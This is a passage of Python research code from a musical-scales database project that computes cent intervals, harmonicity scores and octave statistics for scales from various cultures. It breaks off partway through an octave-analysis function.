VIET = np.array([0., 175., 200., 300., 338., 375., 500., 520., 700., 869., 900., 1000., 1020., 1200.])
CHINA = np.array([0., 113.67291609, 203.91000173, 317.73848174, 407.83554758, 520.68758457, 611.71791523, 701.95500087, 815.62791696, 905.8650026 , 1019.47514332, 1109.76982292, 1201.27828039])
### Maximum allowable deviation from a perfect octave
### i.e., scale is included if the intervals sum to 1200 +- OCT_CUT
OCT_CUT = 50
def calculate_distance_between_windows(x, w):
ints = sorted([int(y) for y in x.split(';')])
windows = [[ints[0]]]
for i in ints[1:]:
if i - windows[-1][0] < w:
windows[-1].append(i)
else:
windows.append([i])
if len(windows) == 1:
return ''
else:
dist = [windows[i+1][0] - windows[i][-1] for i in range(len(windows)-1)]
return ';'.join([str(d) for d in dist])
def get_distance_between_windows(df, w, X='pair_ints'):
df[f"d_w{w}"] = df.loc[:,X].swifter.apply(lambda x: calculate_distance_between_windows(x))
df[f"d_w{w}_min"] = df.loc[:,X].swifter.apply(lambda x: min([int(y) for y in x.split(';')]))
df[f"d_w{w}_mean"] = df.loc[:,X].swifter.apply(lambda x: min([int(y) for y in x.split(';')]))
return df
def calc_relative_entropy(pk, qk):
RE = 0.0
for i in range(len(pk)):
if pk[i] <= 0 or qk[i] <= 0:
continue
else:
RE += pk[i] * np.log2(pk[i] / qk[i])
return RE
def convert_grid(grid, y, num=1201):
new_grid = np.linspace(0, 1200, num=num)
new_y = np.zeros(num, dtype=float)
if grid[0] < 0:
start_point = 0
else:
start_point = np.where(new_grid - grid[0] > 0)[0][0]
if grid[-1] > 1200:
end_point = num
else:
end_point = np.where(new_grid - grid[-1] > 0)[0][0]
for i in range(start_point, end_point):
idx = np.where(grid - new_grid[i] > 0)[0][0]
new_y[i] = y[idx-1] + (new_grid[i] - grid[idx-1]) * (y[idx] - y[idx-1]) / (grid[idx] - grid[idx-1])
return new_grid, new_y
def smooth_dist_kde(df):
X = [float(x) for y in df.pair_ints for x in y.split(';')]
kde = smnp.KDEUnivariate(np.array(X))
kde.fit('gau', 'scott', 1, gridsize=10000, cut=20)
grid, y = kde.support, kde.density
return grid, y
def separate_clusters(pos, w, n_clu):
idx_sort = np.argsort(pos)
cum_diff = [p - pos.min() for p in pos[idx_sort]]
new_clu = []
offset = 0
for cd in cum_diff:
if (cd - offset) > w:
n_clu += 1
offset += cd
new_clu.append(n_clu)
pos[idx_sort] = new_clu
return pos
def get_clusters(df, w=20, cat='pair_ints'):
clusters = []
for pi in [ [int(x) for x in y.split(';')] for y in df.loc[:,cat]]:
pi_inp = np.array([pi, [0]*len(pi)]).T
cluster = DBSCAN(eps=w, min_samples=1).fit(pi_inp)
clu_idx = cluster.labels_
clu_set = set(clu_idx)
for clu_id in sorted(list(clu_set)):
clu_pos = pi_inp[clu_idx==clu_id,0]
clu_range = clu_pos.max() - clu_pos.min()
if clu_range > w:
new_clu = separate_clusters(clu_pos, w, len(clu_set))
clu_idx[clu_idx==clu_id] = new_clu
[clu_set.add(x) for x in new_clu]
clusters.append(len(set(clu_idx)))
return clusters
def get_ratio_from_cents(cents):
return 2 ** (cents / 1200.)
def get_cents_from_ratio(ratio):
return 1200.*np.log10(ratio)/np.log10(2)
def sum_to_n(n, size, limit=None, nMin=1):
"""Produce all lists of `size` positive integers in decreasing order
that add up to `n`."""
if size == 1:
yield [n]
return
if limit is None:
limit = n
start = (n + size - 1) // size
stop = min(limit, n - size + 1) + 1
for i in range(start, stop):
for tail in sum_to_n(n - i, max(size - 1, nMin), i, nMin=nMin):
yield [i] + tail
def get_all_possible_scales_12_tet(df):
codes = set(df.code.unique())
for i in range(4,13):
for partition in sum_to_n(12, i, limit=4):
ints = [len(np.where(np.array(partition)==j)[0]) for j in range(1,5)]
code = ''.join([str(x) for x in ints])
if code not in codes:
codes.add(code)
df.loc[len(df), ['1','2','3','4','notes_in_scale','code']] = ints + [i] + [code]
return df
def get_all_possible_scales_general(nI=240, iLimit=80, nSmin=4, nSmax=9, nMin=1):
df = pd.DataFrame(columns=['n_notes', 'interval'])
last_len = 0
for i in range(nSmin, nSmax+1):
timeS = time.time()
print(i)
for partition in sum_to_n(nI, i, limit=iLimit, nMin=nMin):
ints = [float(x)*(1200./float(nI)) for x in partition]
code = ';'.join([str(x) for x in ints])
df.loc[len(df), ['n_notes','interval']] = [i] + [code]
print(len(df) - last_len, ' scales found after ...')
last_len = len(df)
print((time.time()-timeS)/60., ' minutes')
return df
def check_for_allowed_ratios(df):
def fn(x):
ints = [float(y) for y in x.split(';')]
ratios = [i / min(ints) for i in ints]
if sum([1 for r in ratios if r not in [1., 1.5, 2., 2.5, 3., 3.5, 4.]]):
# if sum([1 for r in ratios if r not in [1., 2., 3., 4.]]):
return False
else:
return True
df['allowed_ratios'] = df.interval.apply(lambda x: fn(x))
return df
def are_intervals_distinct(df, cent_tol=30.):
def fn(x):
ints = [float(y) for y in x.split(';')]
diffs = np.abs([ints[i] - ints[j] for i in range(len(ints)) for j in range(len(ints))])
return sum([1 for d in diffs if 0.0 < d < cent_tol])
df['distinct'] = df.interval.apply(lambda x: fn(x))
return df
def get_scale_energies_exact_ratios(df):
def fn(x):
ints = [float(y) for y in x.split(';')]
ratios = [i / min(ints) for i in ints]
return np.mean([1./(float(i)-0.5)**3 + np.exp(float(i)) for i in ratios])
df['energy'] = df.interval.apply(lambda x: fn(x))
return df
def get_scale_energies_real_ratios(df):
def fn(x):
ratios = [float(y) for y in x.split(';')]
# ratio_term = np.mean([1./(y-0.5)**3 + np.exp(y) for y in ratios])
ratio_term = np.mean([1./(y/40.) + np.exp(y)*2.0 for y in ratios])
microtuning = BETA * np.mean([(round(y) - y)**2 * float(round(y)) for y in ratios])
return ratio_term + microtuning
df['energy'] = df.ratios.apply(lambda x: fn(x))
return df
def get_ratios_from_ints(df):
def fn(x):
ratios = [float(y) for y in x.split(';')]
base_ints = np.arange(25., min(ratios)*1.2, 5.)
min_energy = 10.e10
max_base = 1.
for i, base in enumerate(base_ints):
energy = calculate_energy_harmonic(ratios, base)
if energy <= min_energy:
min_energy = energy
max_base = base
return ';'.join([str(round(y / max_base, 2)) for y in ratios ])
df['ratios'] = df.interval.apply(lambda x: fn(x))
return df
def get_min_energy_integer_ratios(scale):
ratios = []
base_o = []
base_ints = np.arange(35., 155., 5.)
for pi in pair_ints:
energy = np.zeros(base_ints.size, dtype=float)
for i, base in enumerate(base_ints):
energy[i] = calculate_energy(pi, base)
ratios.append([x / base_ints[np.argmin(energy)] for x in pi ])
base_o.append(base_ints[np.argmin(energy)])
print(base_ints[np.argmin(energy)], pi)
print(energy)
return ratios, base_o
def plot_real_vs_derived_ints(df, pair_ints, iMin=100., n=7, weights=[]):
fig, ax1 = plt.subplots(2,1)
idx = [i for i in range(len(pair_ints)) if len(pair_ints[i])==n]
b = [[float(y) for y in x.split(';')] for x in df.loc[(df.min_int.apply(lambda x: x>=iMin))&(df.n_notes==n)&(df.allowed_ratios), 'interval']]
sns.distplot([float(y) for x in df.loc[(df.allowed_ratios)&(df.n_notes==n)&(df.min_int.apply(lambda x: x>=iMin)), 'interval'] for y in x.split(';')], bins=100, ax=ax1[0], label='derived')
sns.distplot([c/min(a) for a in b for c in a], bins=100, ax=ax1[1], label='derived')
if len(weights):
w1 = [weights[i] for i in idx for y in range(len(pair_ints[i]))]
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real', hist_kws={'weights':w1})
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real', hist_kws={'weights':w1})
else:
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real')
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real')
ax1[0].legend(loc='best')
ax1[1].legend(loc='best')
plt.show()
def plot_real_vs_derived_ints_energy_cutoff(df, pair_ints, eCut=1000., iMin=100., n=7, weights=[]):
fig, ax1 = plt.subplots(2,1)
idx = [i for i in range(len(pair_ints)) if len(pair_ints[i])==n]
idx2 = df.loc[(df.energy<eCut)&(df.min_int>=iMin)&(df.n_notes==n)].index
# idx2 = df.loc[(df.energy<eCut)&(df.min_int>=iMin)].index
# idx = range(len(pair_ints))
b = [[float(y) for y in x.split(';')] for x in df.loc[idx2, 'interval']]
sns.distplot([float(y) for x in df.loc[idx2, 'interval'] for y in x.split(';')], bins=100, ax=ax1[0], label='derived')
sns.distplot([c/min(a) for a in b for c in a], bins=100, ax=ax1[1], label='derived')
if len(weights):
w1 = [weights[i] for i in idx for y in range(len(pair_ints[i]))]
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real', hist_kws={'weights':w1})
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real', hist_kws={'weights':w1})
else:
sns.distplot([y for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[0], label='real')
sns.distplot([y/min(x) for x in np.array(pair_ints)[idx] for y in x], bins=100, ax=ax1[1], label='real')
ax1[0].legend(loc='best')
ax1[1].legend(loc='best')
plt.show()
def plot_all_scales_ints_ratios(df):
n_notes = df.n_notes.unique()
fig, ax = plt.subplots(6,2)
for i, n in enumerate(n_notes):
ints = [[float(x) for x in y.split(';')] for y in df.loc[df.n_notes==n,'interval']]
sns.distplot([x for y in ints for x in y], bins=100, ax=ax[i,0], label=str(n))
sns.distplot([y / min(x) for x in ints for y in x], bins=100, ax=ax[i,1], label=str(n))
ax[i,0].legend(loc='best')
ax[i,1].legend(loc='best')
plt.show()
def get_attractors(dI=5.):
sc_i = np.arange(dI, 1200.+dI, dI)
sc_f = set()
attract = []
ratios = []
simils = []
for s in sc_i:
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(s)
if max_similarity == 0.0:
continue
if round(cents,2) not in sc_f:
sc_f.add(round(cents,2))
attract.append(round(cents,2))
ratios.append(best_ratio)
simils.append(max_similarity)
return sc_i, np.array(attract), ratios, simils
def get_harmonic_similarity_score(pair_ints):
output = []
for x in pair_ints:
scores = []
for i in [y for i in range(len(x)) for y in np.cumsum(x[i:])]:
if i == 0:
continue
sc, _, _ = calculate_most_harmonic_neighbour(i)
scores.append(sc)
output.append( np.mean(scores) )
return output
def get_similarity_of_nearest_attractor(x, sc_f, simil):
minIdx = np.argmin(np.abs(sc_f - x))
return simil[minIdx]
def get_nearest_attractor(x, sc_f, ratio):
minIdx = np.argmin(np.abs(sc_f - x))
return ':'.join([str(int(r)) for r in ratio[minIdx]])
def get_harmonic_similarity_score_df(df):
sc_i, sc_f, ratios, simil = get_attractors()
df['harm_sim'] = df.all_ints.apply(lambda x: np.mean([get_similarity_of_nearest_attractor(float(y), sc_f, simil) for y in x.split(';')]))
return df
def get_attractors_in_scale(df):
sc_i, sc_f, ratios, simil = get_attractors()
df['attractors'] = df.all_ints.apply(lambda x: ';'.join([str(get_nearest_attractor(float(y), sc_f, ratios)) for y in x.split(';')]))
return df
def get_weighted_harmonic_similarity_score(pair_ints):
output = []
for x in pair_ints:
scores = []
for i in range(len(x)):
for j, y in enumerate(np.cumsum(x[i:])):
if y == 0:
continue
sc, _, _ = calculate_most_harmonic_neighbour(y)
scores.append(sc)
if i == 0:
scores.append(sc)
output.append( np.mean(scores) )
return output
def get_harmonic_similarity_score_extra_notes(df):
def fn(x):
a = [int(y) for y in x*2]
return np.mean(INTERVAL_SCORE[[l-1 for i in range(len(x)) for l in list(np.cumsum(a[i:i+len(x)]))]])
df['score_en'] = df.str_fmt.apply(lambda x: fn(x))
return df
def calculate_most_harmonic_neighbour(int_cents, sim_only=False):
best_ratio = [1,1]
max_similarity = 0.0
cents = 0.0
for x in np.arange(1,75, dtype=float):
cent_diff = 1200.*np.log10((x+1.)/x)/np.log10(2.) - int_cents
if cent_diff > CENT_DIFF_MAX:
continue
for y in np.arange(x+1.,99., dtype=float):
cent_diff = abs(1200.*np.log10(y/x)/np.log10(2.)- int_cents)
if cent_diff > CENT_DIFF_MAX:
continue
simil = ((x+y-1.)/(x*y))*100.
if simil > max_similarity:
cents = 1200.*np.log10(y/x)/np.log10(2.)
best_ratio = [y,x]
max_similarity = simil
if sim_only:
return max_similarity
else:
return max_similarity, best_ratio, cents
def get_most_harmonic_ratios_equal_temp():
real_num = [2.**(x/1200.) for x in np.arange(100, 1300, 100, dtype=float)]
CENT_DIFF_MAX = 22.0
harmonic_similarity = []
for i, num in enumerate(real_num):
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(int_cents)
harmonic_similarity.append(max_similarity)
return np.array(harmonic_similarity)
# Takes as input the scale given in cents from 0 to 1200
def get_similarity_rating_any_scale(scale_cents):
all_ints = [scale_cents[j] - scale_cents[i] for i in range(len(scale_cents)) for j in range(i+1, len(scale_cents))]
real_num = [2.**(x/1200.) for x in all_ints]
harmonic_similarity = []
for i, num in enumerate(real_num):
int_cents = 1200.*np.log10(num)/np.log10(2.)
max_similarity, best_ratio, cents = calculate_most_harmonic_neighbour(int_cents)
harmonic_similarity.append(max_similarity)
return np.array(harmonic_similarity)
def get_harmonic_similarity_score_equal_temp(df):
INTERVAL_SCORE = get_most_harmonic_ratios_equal_temp()
def fn(x):
a = [int(y) for y in x]
return np.mean(INTERVAL_SCORE[[l-1 for i in range(len(a)) for l in list(np.cumsum(a[i:]))]])
df['score_eq'] = df.str_fmt.apply(lambda x: fn(x))
return df
def get_harmonic_similarity_score_equal_temp_extra_notes(df):
INTERVAL_SCORE = get_most_harmonic_ratios_equal_temp()
def fn(x):
a = [int(y) for y in x*2]
return np.mean(INTERVAL_SCORE[[l-1 for i in range(len(x)) for l in list(np.cumsum(a[i:i+len(x)]))]])
df['score_eq_en'] = df.str_fmt.apply(lambda x: fn(x))
return df
def dataframe_possible_scales(df):
sc_df = pd.DataFrame(columns=['n_notes', 'code', 'str_fmt', 'family'])
for row in df.itertuples():
for fams in row.families.split(';'):
sp = fams.split('-')
fam = int(sp[0])
for scale in sp[1].split(','):
sc_df.loc[len(sc_df)] = [row.notes_in_scale, row.code, scale, fam]
return sc_df
def plot_score_histograms(df):
fig, ax = plt.subplots(2,2, sharex=True, sharey=True)
ax = ax.reshape(4)
lbls = ['score' + s for s in ['', '_en', '_eq', '_eq_en']]
for i, a in enumerate(ax):
for n in df.n_notes.unique():
sns.distplot(df.loc[df.n_notes==n, lbls[i]], label=str(n), kde=True, ax=a)
a.legend(loc='best')
a.set_ylim(0,2)
plt.show()
def get_intervals_as_list(df, i):
ints = [int(x) for x in df.loc[i,['1','2','3','4']]]
return ''.join([ j for i in range(4) for j in ints[i]*str(i+1) ])
def get_translational_invariants(non_ident):
trans_inv = []
variants = set()
families = {}
for ni in non_ident:
if ni in variants:
continue
var_set = set(''.join(np.roll([x for x in ni],i)) for i in range(len(ni)) )
[variants.add(x) for x in var_set]
trans_inv.append(ni)
families.update({ni:var_set})
return trans_inv, families
def get_unique_scales(df):
for row in df.itertuples():
if np.isnan(row.possible_arrangements):
ll = get_intervals_as_list(df, row[0])
non_identical = [''.join(x) for x in set(permutations(ll))]
df.loc[row[0],'n_ni'] = len(non_identical)
trans_inv, families = get_translational_invariants(non_identical)
df.loc[row[0],'n_ti'] = len(trans_inv)
ti_str = ';'.join([str(i)+'-'+ trans_inv[i] for i in range(len(trans_inv))])
fam_str = ';'.join([str(i)+'-'+ ','.join(families[trans_inv[i]]) for i in range(len(trans_inv))])
df.loc[row[0],'trans_inv'] = ti_str
df.loc[row[0],'families'] = fam_str
df.loc[row[0],'possible_arrangements'] = ti_str
return df
def match_scale_with_instrument(scale):
in_mask = np.where(INST)[0]
sc_mask = np.array([int(x) for x in scale], dtype=bool)
notes_per_key = []
for key in range(12):
notes_per_key.append(sum([1 for x in np.where(sc_mask[key:])[0] if x in in_mask ]))
return ';'.join([str(x) for x in notes_per_key])
def count_those_over_75p(mix):
counts, n_max = mix.split('-')
return sum([1 for x in counts.split(';') if float(x) >= 0.75*(float(n_max)*2.+1.)])
def count_those_over_85p(mix):
counts, n_max = mix.split('-')
return sum([1 for x in counts.split(';') if float(x) >= 0.85*(float(n_max)*2.+1.)])
def new_score(mix):
counts, n_notes = mix.split('-')
n_max = int(n_notes) * 2 + 1
points = {n_max-i: max(5-i,0) for i in range(n_max)}
return sum([points[int(x)] for x in counts.split(';')])
def a_n_u(scale):
in_mask = np.where(INST)[0]
sc_mask = np.array([int(x) for x in scale], dtype=bool)
notes_in_scale = len(in_mask)
notes_per_key = []
for key in range(12):
notes_per_key.append(sum([1 for x in in_mask if x in np.where(sc_mask[key:])[0] ]))
return sum([ 1 for x in notes_per_key if x == notes_in_scale ])
def all_notes_used(df):
df['all_notes'] = df['mask'].apply(lambda x: a_n_u(x))
return df
def get_inst_var_score(df):
df['inst_keys'] = df['mask'].apply(lambda x: match_scale_with_instrument(x))
df['inst_score'] = df.inst_keys.apply(lambda x: sum([int(y) for y in x.split(';')]))
df['inst_norm'] = df.inst_score.astype(float) / (df.n_notes.astype(float) * 2. + 1.) / 12.
df['inst_std'] = df.inst_keys.apply(lambda x: np.std([float(y) for y in x.split(';')])) / (df.n_notes.astype(float) * 2. + 1.) / 12.
tmp_df = df.inst_keys + '-' + df.n_notes.astype(str)
df['inst_75p'] = tmp_df.apply(lambda x: count_those_over_75p(x))
df['inst_85p'] = tmp_df.apply(lambda x: count_those_over_85p(x))
df['inst_new_score'] = tmp_df.apply(lambda x: new_score(x))
return df
def df_cols_as_int(df):
cols = ['1','2','3','4','possible_arrangements','notes_in_scale','n_ni','n_ti']
df.loc[:, cols] = df.loc[:, cols].astype(int)
return df
def get_codes(df):
for row in df.itertuples():
df.loc[row[0],'code'] = ''.join([str(row[i]) for i in range(1,5)])
return df
def reformat_scales_as_mask(df):
st = '000000000000001'
fn = lambda x: '1' + ''.join([st[-int(i):] for i in x])
idx = df.loc[df.Tuning.apply(lambda x: x not in ['Unique', 'Turkish', '53-tet'])].index
df.loc[idx, 'mask'] = df.loc[idx, 'Intervals'].apply(fn)
fn = lambda x: '1' + ''.join([st[-int(i):] for i in x.split(';')])
idx = df.loc[df.Tuning=='53-tet'].index
df.loc[idx, 'mask'] = df.loc[idx, 'Intervals'].apply(fn)
return df
def extract_scales_and_ints_from_scales(df):
names = []
scales = []
all_ints = []
pair_ints = []
cultures = []
tunings = []
conts = []
ref = []
theory = []
for row in df.itertuples():
try:
idx = np.where(np.array([int(x) for x in row.mask]))[0]
except:
pass
for tun in row.Tuning.split(';'):
if tun == '12-tet':
scale = EQ12_INTS[idx]
elif tun == '53-tet':
scale = EQ53_INTS[idx]
elif tun == 'Just':
scale = JI_INTS[idx]
elif tun == 'Pythagorean':
scale = PYT_INTS[idx]
elif tun == 'Arabian':
scale = EQ24_INTS[idx]
elif tun == 'Dastgah-ha':
scale = DASTGAH[idx]
elif tun == 'Vietnamese':
scale = VIET[idx]
elif tun == 'Chinese':
scale = CHINA[idx]
elif tun == 'Turkish':
scale = np.cumsum([0.0] + [TURKISH[a] for a in row.Intervals])
elif tun == 'Khmer':
for KHM in [KHMER_1, KHMER_2]:
base = KHM[[i-1 for i in idx[1:]]]
for i in range(len(base)):
scale = np.cumsum([0.] + np.roll(KHM,i))
names.append(row.Name)
scales.append(scale)
all_ints.append([scale[i] - scale[j] for j in range(len(scale)) for i in range(j+1,len(scale))])
pair_ints.append([scale[j+1] - scale[j] for j in range(len(scale)-1)])
cultures.append(row.Culture)
tunings.append(tun)
conts.append(row.Region)
ref.append(row.Reference)
theory.append(row.Theory)
continue
elif tun == 'Unique':
scale = np.cumsum([0.] + [float(x) for x in row.Intervals.split(';')])
else:
print(row.Name, tun, tun=='12-tet')
continue
names.append(row.Name)
scales.append(scale)
all_ints.append([scale[i] - scale[j] for j in range(len(scale)) for i in range(j+1,len(scale))])
pair_ints.append([scale[j+1] - scale[j] for j in range(len(scale)-1)])
cultures.append(row.Culture)
tunings.append(tun)
conts.append(row.Region)
ref.append(row.Reference)
theory.append(row.Theory)
return cultures, tunings, conts, names, scales, all_ints, pair_ints, ref, theory
# This will not work in all instances!!!
# A proper clustering algorithm is needed
def get_dist_order(pair_ints):
order = []
for ints in pair_ints:
uniq = np.array(list(set(ints)))
idx = [sum([1 for j in range(i+1, len(uniq)) if abs(uniq[i] - uniq[j]) < 45.]) for i in range(len(uniq))]
order.append(np.where(np.array(idx)==0)[0].size)
return order
def reformat_real_scales_as_strings(df):
for row in df.itertuples():
df.loc[row[0],'str_fmt'] = ''.join([str(row[i]) for i in range(1,13) if row[i]])
return df
def match_scale_with_family(df, rs):
for code in rs.code.unique():
dfIdx = df.loc[df.code==code].index[0]
fam_dict = {}
fams = [{z:x.split('-')[0] for z in x.split('-')[1].split(',')} for x in df.loc[dfIdx,'families'].split(';')]
for f in fams:
fam_dict.update(f)
associated_scales = []
for row in rs.loc[rs.code==code].itertuples():
famIdx = fam_dict[row.str_fmt]
associated_scales.append(famIdx + '-' + row.Names)
if len(associated_scales):
df.loc[dfIdx, 'real_scales'] = ';'.join(associated_scales)
df.loc[dfIdx, 'n_rs'] = len(associated_scales)
return df
def get_2grams_dist(df, dI=10, imin=0, imax=620):
int_bins = np.arange(imin, imax+dI, dI)
nI = int_bins.size
dist = np.zeros((nI, nI), dtype=float)
for p_int in df.pair_ints:
pi = [int(x) for x in p_int.split(';')]
for i in range(len(pi)-1):
x = int(pi[i] / float(dI))
y = int(pi[i+1] / float(dI))
dist[x,y] += 1.0
return dist
def plot_2gram_dist_by_n_notes(df, dI=10):
fig, ax = plt.subplots(2,3)
ax = ax.reshape(ax.size)
for i, n in enumerate([4,5,6,7,8,9]):
dist = get_2grams_dist(df.loc[df.n_notes==n], dI=dI)
sns.heatmap(np.log(dist[::-1]+0.1), label=str(n), ax=ax[i])
ax[i].set_title(str(n))
plt.show()
def plot_pair_ints_by_n_notes(df):
fig, ax = plt.subplots(4,2)
ax = ax.reshape(ax.size)
n_notes = sorted(df['n_notes'].unique())
for i, t in enumerate(n_notes):
cultures, tunings, names, scales, all_ints, pair_ints = extract_scales_and_ints_from_scales(df.loc[df['n_notes']==t])
sns.distplot([y for x in pair_ints for y in x], bins=120, label=str(t), ax=ax[i])
ax[i].legend(loc='best')
sns.distplot([y for x in pair_ints for y in x], bins=120, label=str(t), ax=ax[-1])
plt.show()
def plot_pair_ints_by_n_notes_one_graph(df):
fig, ax = plt.subplots()
n_notes = np.arange(4,10)
for i, t in enumerate(n_notes):
cultures, tunings, names, scales, all_ints, pair_ints = extract_scales_and_ints_from_scales(df.loc[df['n_notes']==t])
# sns.distplot([y for x in pair_ints for y in x], bins=120, label=str(t), ax=ax)
sns.kdeplot([y for x in pair_ints for y in x], label=str(t), ax=ax)
ax.legend(loc='best')
plt.show()
def plot_pair_ints_by_tuning(df):
fig, ax = plt.subplots(6,2)
ax = ax.reshape(12)
tunings = df.Tuning.unique()
for i, t in enumerate(tunings):
cultures, tunings, names, scales, all_ints, pair_ints = extract_scales_and_ints_from_scales(df.loc[df['n_notes']==t])
sns.distplot([y for x in pair_ints for y in x], bins=120, label=t, ax=ax[i])
ax[i].legend(loc='best')
plt.show()
def plot_order_vs_n_notes_distplot(order, pair_ints):
len_scales = [len(x) for x in pair_ints]
n_notes = np.unique(len_scales)
fig, ax = plt.subplots(2,1)
order = np.array(order)
for i in range(len(n_notes)):
idx = np.where(len_scales==n_notes[i])[0]
sns.distplot(order[idx], ax=ax[0], label=str(n_notes[i]))
sns.kdeplot(order[idx], ax=ax[1], label=str(n_notes[i]))
ax[0].legend(loc='best')
ax[1].legend(loc='best')
plt.show()
def plot_order_vs_n_notes_heatmap(order, pair_ints):
len_scales = [len(x) for x in pair_ints]
x1 = np.unique(order)
y1 = np.unique(len_scales)
z1 = np.zeros((x1.size, y1.size))
for i in range(len(order)):
x = np.where(x1==order[i])[0]
y = np.where(y1==len_scales[i])[0]
z1[x,y] = z1[x,y] + 1.0
fig, ax = plt.subplots()
sns.heatmap(np.log10(z1+1), ax=ax, cmap='Greys')
ax.set_xticklabels(y1)
ax.set_yticklabels(x1)
plt.show()
def plot_score_by_cat(df, cat='Tuning', score='s1'):
uni = df.loc[:,cat].unique()
if uni.size <=12:
fig, ax = plt.subplots(4,3)
elif uni.size <=24:
fig, ax = plt.subplots(6,4)
ax = ax.reshape(ax.size)
for i, u in enumerate(uni):
if df.loc[(df.loc[:,cat]==u)&(df.loc[:,score].notnull()), score].size ==0:
sns.distplot(df.loc[(df.loc[:,score].notnull()), score], ax=ax[i], bins=100, label='all')
continue
sns.distplot(df.loc[(df.loc[:,cat]==u)&(df.loc[:,score].notnull()), score], ax=ax[i], bins=100, label=u)
ax[i].legend(loc='best')
plt.show()
def calculate_energy_harmonic(ints, base):
return np.mean([(round(i/base) - i/base)**2 for i in ints])
def calculate_energy(ints, base):
return np.mean([(round(i/base) - i/base)**2 * float(round(i/base)) for i in ints])
def get_min_energy_integer_ratios(pair_ints):
ratios = []
base_o = []
base_ints = np.arange(35., 155., 5.)
for pi in pair_ints:
energy = np.zeros(base_ints.size, dtype=float)
for i, base in enumerate(base_ints):
energy[i] = calculate_energy(pi, base)
ratios.append([x / base_ints[np.argmin(energy)] for x in pi ])
base_o.append(base_ints[np.argmin(energy)])
print(base_ints[np.argmin(energy)], pi)
print(energy)
return ratios, base_o
def reformat_surjodiningrat(df):
for row in df.itertuples():
ints = [get_cents_from_ratio(float(row[i+3])/float(row[i+2])) for i in range(7) if row[i+3] != 0]
df.loc[row[0], 'pair_ints'] = ';'.join([str(int(round(x))) for x in ints])
df['Reference'] = 'Surjodiningrat'
df['Theory'] = 'N'
df = df.drop(columns=[str(x) for x in range(1,9)])
return df
def reformat_original_csv_data(df):
new_df = pd.DataFrame(columns=['Name', 'Intervals', 'Culture', 'Region', 'Tuning', 'Reference', 'Theory'])
for i, col in enumerate(df.columns):
tuning = df.loc[0, col]
culture = df.loc[1, col]
cont = df.loc[2, col]
ref = df.loc[3, col]
theory = df.loc[4, col]
try:
int(col)
name = '_'.join([culture, col])
except:
name = col
ints = ';'.join([str(int(round(float(x)))) for x in df.loc[5:, col] if not str(x)=='nan'])
new_df.loc[i] = [name, ints, culture, cont, tuning, ref, theory]
return new_df
def extract_scales_and_ints_from_unique(df):
names = []
scales = []
all_ints = []
pair_ints = []
cultures = []
tunings = []
conts = []
ref = []
theory = []
for row in df.itertuples():
ints = [int(x) for x in row.Intervals.split(';')]
if sum(ints) < (1200 - OCT_CUT):
continue
start_from = 0
for i in range(len(ints)):
if i < start_from:
continue
sum_ints = np.cumsum(ints[i:], dtype=int)
if sum_ints[-1] < (1200 - OCT_CUT):
break
# Find acceptable octave and call everything
# in between a scale
idx_oct = np.argmin(np.abs(sum_ints-1200))
oct_val = sum_ints[idx_oct]
if abs(oct_val - 1200) > OCT_CUT:
continue
scale = [0.] + list(sum_ints[:idx_oct+1])
names.append(row.Name)
scales.append(scale)
all_ints.append([scale[i] - scale[j] for j in range(len(scale)) for i in range(j+1,len(scale))])
pair_ints.append([scale[j+1] - scale[j] for j in range(len(scale)-1)])
cultures.append(row.Culture)
tunings.append(row.Tuning)
conts.append(row.Region)
ref.append(row.Reference)
theory.append('N')
start_from = idx_oct + i
return cultures, tunings, conts, names, scales, all_ints, pair_ints, ref, theory
```
#### File: Scales_database/Src/octave.py
```python
from itertools import product
import os
import matplotlib.pyplot as plt
from multiprocessing import Pool
import numpy as np
from palettable.colorbrewer.qualitative import Paired_12, Set2_8, Dark2_8, Pastel2_8, Pastel1_9
import pandas as pd
import seaborn as sns
from scipy.signal import argrelmax
from scipy.stats import mannwhitneyu, lognorm, norm
import process_csv
from process_csv import DATA_DIR
import utils
N_PROC = 60
def load_text_summary():
df = pd.read_excel('../scales_database.xlsx', "source_list")
Y1 = "Players exhibit octave?"
Y2 = "Sources indicate that octave is generally used in culture?"
for Y in [Y1, Y2]:
df.loc[df[Y].isnull(), Y] = ''
return df.loc[:, [Y1, Y2]]
def get_md2(ints):
if isinstance(ints, str):
ints = np.array([float(x) for x in ints.split(';')])
return np.min([np.sum(np.roll(ints, i)[:2]) for i in range(len(ints))])
# md2 = np.array([np.sum(np.roll(poss, i, axis=1)[:,:2], axis=1) for i in range(7)]).min(axis=0)
def instrument_tunings():
df = pd.concat([pd.read_excel('../scales_database.xlsx', f"scales_{a}") for a in 'BCDEF'], ignore_index=True)
df['Intervals'] = df.Intervals.apply(lambda x: utils.str_to_ints(x))
df['scale'] = df.Intervals.apply(np.cumsum)
df['max_scale'] = df.scale.apply(max)
df['min_int'] = df.Intervals.apply(min)
df['max_int'] = df.Intervals.apply(max)
df['AllInts'] = df.Intervals.apply(lambda x: [y for i in range(len(x)-1) for y in np.cumsum(x[i:])])
return df
def octave_chance(df, n_rep=10, plot=False, octave=1200, w=50):
df = df.loc[df.scale.apply(lambda x: x[-2] >= octave-w)]
print(len(df))
ints = df.Intervals.values
# all_ints = np.array([x for y in ints for x in np.cumsum(y)])
all_ints = np.array([x for y in ints for i in range(len(y)) for x in np.cumsum(y[i:])])
oct_real = all_ints[(all_ints>=octave-w)&(all_ints<=octave+w)]
print(len(oct_real), len(oct_real) / len(all_ints))
shuffled_ints = []
for j in range(n_rep):
for i in ints:
ran = np.random.choice(i, replace=False, size=len(i))
# for k in np.cumsum(ran):
# shuffled_ints.append(k)
for k in range(len(ran)):
for m in np.cumsum(ran[k:]):
shuffled_ints.append(m)
shuffled_ints = np.array(shuffled_ints)
idx = (shuffled_ints>=octave-w)&(shuffled_ints<=octave+w)
oct_shuf = shuffled_ints[idx]
print(len(oct_shuf) / len(shuffled_ints))
if plot:
fig, ax = plt.subplots(1,2)
